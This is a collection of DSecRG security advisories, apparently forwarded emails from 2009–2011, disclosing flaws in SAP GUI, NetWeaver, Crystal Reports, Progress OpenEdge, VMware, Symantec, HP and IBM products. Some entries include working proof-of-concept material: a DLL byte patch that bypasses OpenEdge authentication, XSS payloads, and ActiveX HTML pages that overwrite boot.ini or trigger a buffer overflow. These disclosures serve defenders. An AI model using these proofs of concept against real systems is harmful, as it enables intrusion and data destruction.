http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-11-008] Open Edge RDBMS - Multiple architecture vulnerabilities (UNPATCHED)
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-008 Application:Progress OpenEdge Enterprise RDBMS Versions Affected: 10.2A and maybe others Vendor URL: http://web.progress.com Bug:Authentication bypass, UserID enumerate Exploits: YES Reported: 13.10.2009 Vendor response:13.10.2009 Solution: NONE Date of Public Advisory:24.01.2011 Authors:Alexander Polyakov, Alexey Sintsov, Alexey Troshichev of Digital Security Research Group [DSecRG] Description *** Progress OpenEdge Enterprise RDBMS (formerly known as the Progress RDBMS) is a high-efficiency relational database management system by company Progress Software Corp productions.It is widely used as backend for cutomezed ERP systems. This RDBMS has some vulnerabilities that make possible to enumerate UserID and bypass authentification. Details *** 1. UserID enumerate Attacker can get valid UserID. It is possible because OpenEdge RDBMS server give different answers for situation when password is incorrect and when UserID does not exist. Client application in both way gives the same message - “Your Password and UserID USERID do not much”. But in network layer answers from server are different: Packet 1. From server to client, if UserID exist (UserID eq AAA): 0x 00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00 ..E. 0x0010 00 C3 00 00 00 00 40 06-7C 33 7F 00 00 01 7F 00 .A@.|3.... 0x0020 00 01 0B B8 10 42 56 07-00 00 00 00 00 00 50 00 ...?.BV...P. 0x0030 40 00 00 00 00 00 00 00-00 07 00 2D 00 9B 00 4F @..-.›.O 0x0040 00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00 0x0050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 0x0060 00 00 00 02 00 00 00 01-00 00 7F 68 00 4F FF FB ..h.Oyu 0x0070 00 00 00 00 00 00 0F 02-00 00 00 00 00 00 00 00 0x0080 22 C0 E7 00 02 00 3C 01-FB 03 41 41 41 10 72 6D Acu.AAA.rm 0x0090 57 78 6A 69 64 4E 63 6E-4D 64 6D 69 61 63 03 41 WxjidNcnMdmiac.A 0x00A0 41 41 FA 00 09 FD FD FD-FD FD FD FD FD FF FA 00 AAu..yu. 0x00B0 09 FD FD FD FD FD FD FD-FD FF FD FD FD FD FD FD .yyy 0x00C0 FD FD FD FD FD FD FD FD-FD FD FD FD FD FD FD FD 0x00D0 FDy Packet 2. From server to client, if UserId does not exist: 0x 00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00 ..E. 0x0010 00 74 00 00 00 00 40 06-7C 82 7F 00 00 01 7F 00 .t@.|‚.... 0x0020 00 01 0B B8 10 45 56 07-00 00 00 00 00 00 50 00 ...?.EV...P. 0x0030 40 00 00 00 00 00 00 00-00 07 00 2D 00 4C FB 41 @..-.LuA 0x0040 00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00 0x0050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 0x0060 00 00 00 02 00 00 00 01-00 00 7F 68 00 00 FF FB ..h..yu So attacker can connect to RDBMS server with different UserID and see network answers for getting existing UserID. 2. Authentication bypass Remote attacker can log in into RDBMS use existing or not existing UserID without password. It is possible because authentication process is going on client side. When password incorrect client application reset connection with server and show message box. If password is correct, client send to server UserID which he will be to use in RDBMS. Packet 3. From client to server, when password for UserID TEST2 is correct: 0x 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..E. 0x0010 00 6E 00 00 00 00 40 06-7C 88 7F 00 00 01 7F 00 .n@.|?.... 0x0020 00 01 0B 27 0B B8 13 03-00 00 00 00 00 00 50 00 ...'.?P. 0x0030 40 00 00 00 00 00 00 00-00 09 00 14 00 46 00 00 @F.. 0x0040 00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00 0x0050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 73 ..Us 0x0060 65 72 69 64 20 69 73 20-6E 6F 77 20 54 45 53 54 erid is now TEST 0x0070 32 2E 20 28 37 30 38 29-00 00 00 00 2. (708) Example of attack: Patch of %OpenEdge%\bin\prow32.dll (for version 10.2A) Begin address: 0x020065 - 0f85ce02 + 909090909090 After that run DataAdministration(%OpenEdge%\bin\prowin32.exe) and try to enter into RDBMS with any UserID and without password. Application show error message box, but allow to enter into RDBMS with chosen UserId. If chosen UserID has a Security Administrator privileges, so attacker gets this privileges. By default in OpenEdge RDBMS all users have Security Administrator privileges. Fix Information *** The only one possible fix is to use Windows authentication instead of proprietary. References * http://dsecrg.com/content/vul/edit.php?id=308
[DSECRG-00142] SAP Crystal Reports 2008 - actionNavjsp_xss
XSS vulnerability found in SAP Crystal Report Server 2008 Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://sap.com Bugs: Linked XSS Vulnerability Exploits: YES Reported: 04.03.2010 Vendor response: 05.03.2010 Date of SAPNOTE Published: 8.10.2010 Date of Public Advisory: 14.01.2011 Authors: Dmitry Chastuhin Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet. Details ** Multiple XSS vulnerabilities found in InfoView module 1. Vulnerability discovered in JSP - page actionNav.jsp module InfoView, located at http://sap_server_adr:8080/InfoViewApp/jsp/common/actionNav.faces. Vulnerable parameter - actId. Any user can cheat a vulnerable link and steal user's or Administrator's cookie. 2. Vulnerability discovered in JSP - page error.jsp module InfoView, located at http://sap_server_adr:8080/InfoViewApp/jsp/common/error.jsp Vulnerable parameter - backUrl Any user can cheat a vulnerable link and steal user's or Administrator's cookie. 3. Vulnerability discovered in JSP - page logon.jsp module InfoView, located at http://sap_server_adr:8080/InfoViewApp/logon.jsp Vulnerable parameter - logonAction Any user can cheat a vulnerable link and steal user's or Administrator's cookie References ** http://dsecrg.com/pages/vul/show.php?id=301 http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a https://service.sap.com/sap/support/notes/1458310 Fix Information *** Solution to this issue is given in the 1458310 security note. About * Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like:enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product ERPSCAN security suite for SAP Netweaver and service ERPSCAN Online which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-040] SAP Netweaver wsnavigator XSS Security Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-040 Application:SAP Netweaver Versions Affected: Version 6.4 - 7.0 Vendor URL: http://SAP.com Bugs: XSS Exploits: YES Reported: 26.05.2009 Vendor response:27.05.2009 Date of Public Advisory:13.07.2010 CVE-number: Author: Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) In addition by another security researcher at the same time. Description *** SAP Netweaver system has linked XSS security vulnerability in wsnavigator component Details *** http://dsecrg.com/pages/vul/show.php?id=140 Example *** https://server/wsnavigator/jsps/explorer/help.jsp?title=Test;scriptalert('XSS')/script References ** http://dsecrg.com/pages/vul/show.php?id=140 https://service.sap.com/sap/support/notes/1169248 Fix Information *** A solution for this issue is given by SAP in security note 1169248 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group focuses on enterprise application (ERP) and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA,PA-QSA Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSecRG-09-053] VMware Remoute Console - format string
Digital Security Research Group [DSecRG] Advisory DSECRG-09-053 Application:VMware Remoute Console Version:e.x.p build-158248 Vendor URL: http://vmware.com Bugs: Format String Vulnerabilitys Exploits: YES (PoC) Reported: 07.08.2009 Vendor response:13.08.2009 Date of Public Advisory:09.04.2010 CVE:CVE-2009-3732 VSA:VMSA-2010-0007 Authors:Alexey Sintsov of Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description VMware Remote Console Plug-in can be installed from WEB interface of VMware vSphere. This software contains of ActiveX objects and executable files for remote console of guest OS. VMrc vulnerable to format string attacks. Exploitation of this issue may lead to arbitrary code execution on the system where VMrc is installed. Details *** Details on official advisory http://dsecrg.com/pages/vul/show.php?id=153 References ** http://dsecrg.com/pages/vul/show.php?id=153 http://lists.vmware.com/pipermail/security-announce/2010/90.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005, PCI DSS and PA-DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA, PA-QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-049 Application: IBM BladeCenter Managmet Module Versions Affected: before BPET50G Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: DoS Exploits:YES Reported:24.07.2009 Vendor response: 26.07.2009 Date of Public Advisory: 15.04.2010 Solution:YES Author: Alexey Sintsov of Digital Security Research Group [DSecRG] Description *** The BladeCenter management module is a hot-swappable hardware device plugged into the BladeCenter chassis management bay. The management module functions as a system-management processor (service processor) and keyboard, video, and mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted. Details *** Details in official Advisory http://dsecrg.com/pages/vul/show.php?id=149 Solution The issue has been fixed in AMM firmware version bpet50g and later. Refernces * http://dsecrg.com/pages/vul/show.php?id=149 http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5083945brandind=520 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com
[DSECRG-09-064] SAP GUI - Insecure method, code execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-064 Application:SAP GUI Versions Affected: SAP GUI (SAP GUI 7.1) Vendor URL: http://SAP.com Bugs: Insecure method. Code Execution. Exploits: YES Reported: 16.10.2009 Vendor response:27.10.2009 Date of Public Advisory:23.03.2010 Author: Alexey Sintsov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX control component which is a part of SAP GUI. Details *** can be found inhttp://dsecrg.com/pages/vul/show.php?id=164 Fix Information *** All patches are available since December via note 1407285 References ** http://dsecrg.com/pages/vul/show.php?id=164 https://service.sap.com/sap/support/notes/1407285. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-039] Symantec Antivirus 10.0 ActiveX - buffer Overflow.
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-039 Application:Symantec Antivirus Client Proxy Versions Affected: Version 10 Vendor URL: http://symantec.com Bugs: Buffer Overflow Exploits: POC Reported: 04.05.2009 Vendor response:07.05.2009 Date of Public Advisory:17.02.2010 CVE-number: CVE-2010-0108 Author: Alexander Polyakov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Symantec Antivirus Client Proxy, CLIproxy.dll contains ActiveX component which is vulnerable to Buffer overflow attack. Details *** http://dsecrg.com/pages/vul/show.php?id=139 Fix Information *** Symantec product engineers have released a fix for this issue in the MR9 update. Symantec recommends all customers apply the latest available update to protect against threats of this nature. Symantec is not aware of any exploitation of or adverse customer impact from these issues. References ** Symantec would like to thank Alexander Polyakov from DSecRG for reporting these issues and coordinating with us while Symantec resolved them. http://dsecrg.com/pages/vul/show.php?id=139 http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisorypvid=security_advisoryyear=2010suid=20100217_02 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-065] TVUPlayer PlayerOcx.ocx ActiveX - Insecure method
ActiveX component contains insecure method that can overwrite any file in system Digital Security Research Group [DSecRG] Advisory #DSECRG-09-065 Application: TVUPlayer Versions Affected: Tested on v2.4.9beta1[build1797] Vendor URL: www.tvunetworks.com Bugs:insecure method, File overwriting Exploits:YES Reported:25.11.2009 Second report11.01.2010 Vendor response: none Date of Public Advisory: 03.02.2010 CVE-number: Author: Evdokimov Dmitriy Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** TVUPlayer contains ActiveX component PlayerOcx ( file PlayerOcx.ocx) Lib GUID: {18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8} which is contains insecure method that can overwrite any file in system. Details *** Detail can be found in official advisory http://dsecrg.com/pages/vul/show.php?id=165 Fix Information *** There is no official fix from vendor because vendor did not give any response for 2 times. As an alternative - user can set killbit on this component. References ** http://dsecrg.com/pages/vul/show.php?id=165 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-011] HP StorageWorks 1_8 G2 Tape Autoloader - privilege escalation DOS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-011 Application:HP StorageWorks 1/8 G2 Tape Autoloader Versions Affected: firmware v 2.30 and earlier Vendor URL: http://hp.com/ Bug:Privilege escalation Exploits: YES Reported: 30.09.2008 Vendor Response:30.09.2008 Date of Public Advisory:10.01.2010 Solution: yes CVE:CVE-2009-2680 CVSS 2.0: 8.5 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Vulnerability found in Web Administration Interface of device HP StorageWorks 1/8 G2 Tape Autoloader. Default unprivileged user can escalate privileges to administrator. Details *** http://dsecrg.com/pages/vul/show.php?id=111 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. --- -- Конец пересылаемого письма -- -- Polyakov Alexandr Head of security audit department Head of Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. --- ---BeginMessage--- Digital Security Research Group [DSecRG] Advisory #DSECRG-09-011 Application:HP StorageWorks 1/8 G2 Tape Autoloader Versions Affected: firmware v 2.30 and earlier Vendor URL: http://hp.com/ Bug:Privilege escalation Exploits: YES Reported: 30.09.2008 Vendor Response:30.09.2008 Date of Public Advisory:10.01.2010 Solution: yes CVE:CVE-2009-2680 CVSS 2.0: 8.5 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Vulnerability found in Web Administration Interface of device HP StorageWorks 1/8 G2 Tape Autoloader. Default unprivileged user can escalate privileges to administrator. Details *** http://dsecrg.com/pages/vul/show.php?id=111 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr. PCI QSA. Head of security audit department Head of Digital Security Research Group
(edited) [DSECRG-09-044] SAP GUI 7.1 Insecure Methods
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-044 Application:EnjoySAP, SAP GUI for Windows 6.4 and 7.1 Versions Affected: Tested on 7100.2.7.1038 PL 7 Vendor URL: http://SAP.com Bugs: insecure method, File owervriting Exploits: YES Reported: 02.07.2009 Vendor response:02.07.2009 Date of Public Advisory:22 сент CVE-number: Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP GUI for Windows 7.1 and 6.4 contains ActiveX component EAI WebViewer3D ( file WebViewer3D.dll) Lib GUID:{AFBBE070-7340-11d2-AA6B-00E02924C34E} which is contains insecure method that can overwrite any file in system. Details *** Attacker can construct html page which call one of the wulnerable functions such as: 1) SaveToSessionFile 2) SaveViewToSessionFile from ActiveX component EAI WebViewer3D Example1: HTML BODY object id=ctrl classid=clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}/object SCRIPT function Do_1t() { File = ../../../../../../../../../../../../boot.ini ctrl.SaveToSessionFile(File) } /SCRIPT input language=JavaScript onclick=Do_1t() type=button value=P0c /BODY /HTML Example2: HTML BODY object id=ctrl classid=clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}/object SCRIPT function Do_1t() { File = ../../../../../../../../../../../../boot.ini ctrl.SaveViewToSessionFile(File) } /SCRIPT input language=JavaScript onclick=Do_1t() type=button value=P0c /BODY /HTML For example we can overwrite boot.ini file or sapgui.ini which contains all connectionbs to sap servers Fix Information *** About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com
[DSECRG-09-043] SAP GUI 7.1 Insecure Method
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-043 Application:EAI WebViewer2D (EnjoySAP, SAP GUI for Windows 6.4 and 7.1) Versions Affected: Tested on 7100.2.7.1038 PL 7 Vendor URL: http://SAP.com Bugs: insecure method, File owervriting Exploits: YES Reported: 02.07.2009 Vendor response:02.07.2009 Date of Public Advisory:28.09.2009 CVE-number: Author: Alexandr Polyakov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** SAP GUI for Windows 7.1 and 6.4 contains ActiveX component EAI WebViewer2D ( file WebViewer2D.dll) Lib GUID:{A76CEBEE-7364-11D2-AA6B-00E02924C34E} which is contains insecure method that can overwrite any file in system. Details *** Attacker can construct html page which call vulnerable function SaveToSessionFile from ActiveX component EAI WebViewer2D Example1: HTML BODY object id=ctrl classid=clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}/object SCRIPT function Do_1t() { File = ../../../../../../../../../../../../boot.ini ctrl.SaveToSessionFile(File) } /SCRIPT input language=JavaScript onclick=Do_1t() type=button value=P0c /BODY /HTML For example we can overwrite boot.ini file or sapgui.ini which contains all connectionbs to sap servers Fix Information *** The security issue is addressed with SAP note 1372153. the methods given in the message have been changed recently to immediately return and they do nothing. References ** http://dsecrg.com/pages/vul/show.php?id=143 https://service.sap.com/sap/support/notes/1372153. About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability
http://www.dsecrg.com/pages/vul/show.php?id=133 Digital Security Research Group [DSecRG] Advisory #DSECRG-09-033 Application:SAP NetWeaver Application Server (Java) Versions Affected: Version 7.0 Vendor URL: http://SAP.com Bugs: XSS Exploits: YES Reported: 18.03.2009 Vendor response:19.03.2009 Date of Public Advisory:11.08.2009 CVE-number: Author: Alexander Polyakov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP NetWeaver Application Server (Java) system has Linked XSS security vulnerability in UDDI client. Details *** Linked XSS vulnerability in UDDI client. vulnerability found in page /uddiclient/process vulnerable field TModel Key Example *** aaimg/src=javascript:alert('dsecrg xss') Fix Information *** The issue has been solved. See SAP note 1322098. References: *** SAP note 1322098 https://service.sap.com/sap/support/notes/1322098 DSecRG-09-033 http://www.dsecrg.com/pages/vul/show.php?id=133 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Polyakov Alexandr Chief Information Security Analyst __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polya...@dsec.ru www.dsec.ru www.dsecrg.com www.pcidss.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-015] SAP GUI 6.4 Buffer Overflow vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-015 Original Advisory: http://dsecrg.com/pages/vul/show.php?id=115 Application:SAP GUI for Windows, EnjoySAP Versions Affected: Version 6.4 Vendor URL: http://SAP.com Bugs: Buffer Overflow Exploits: YES Reported: 13.11.2008 Vendor response:17.11.2008 Date of Public Advisory:08.06.2009 CVE-number: Author: Alexander Polyakov Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP GUI for Windows version 6.4 contains ActiveX component SAPIrRfc which is vulnerable to Buffer overflow attack. file = sapirrfc.dll GUID = F6908F83-ADA6-11D0-87AA-00AA00198702 Details *** Attacker can construct html page which will call vulnerable function Accept from ActiveX Object SAPIrRfc with long parameter. When user open this vulnerable page it will occur DOS (Example 1) or full remote control on target system (Example2 execute calc.exe aviable by request) . Example1: * html object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' / script arg1= target.Accept arg1 /script /html Fix Information *** The issue has been solved. See SAP note 1286637. References: *** SAP note 1286637 https://service.sap.com/sap/support/notes/1286637 http://dsecrg.com/pages/vul/show.php?id=115 About * Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com Regards, Alexander Polyakov Digital Security Research Group [DSecRG] DIGITAL SECURITY tel/fax: +7(812)703-1547 tel: +7(812)430-9130 e-mail: resea...@dsecrg.com web: www.dsecrg.com This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed.
[DSECRG-09-016] SAP SAPDB Multiple XSS
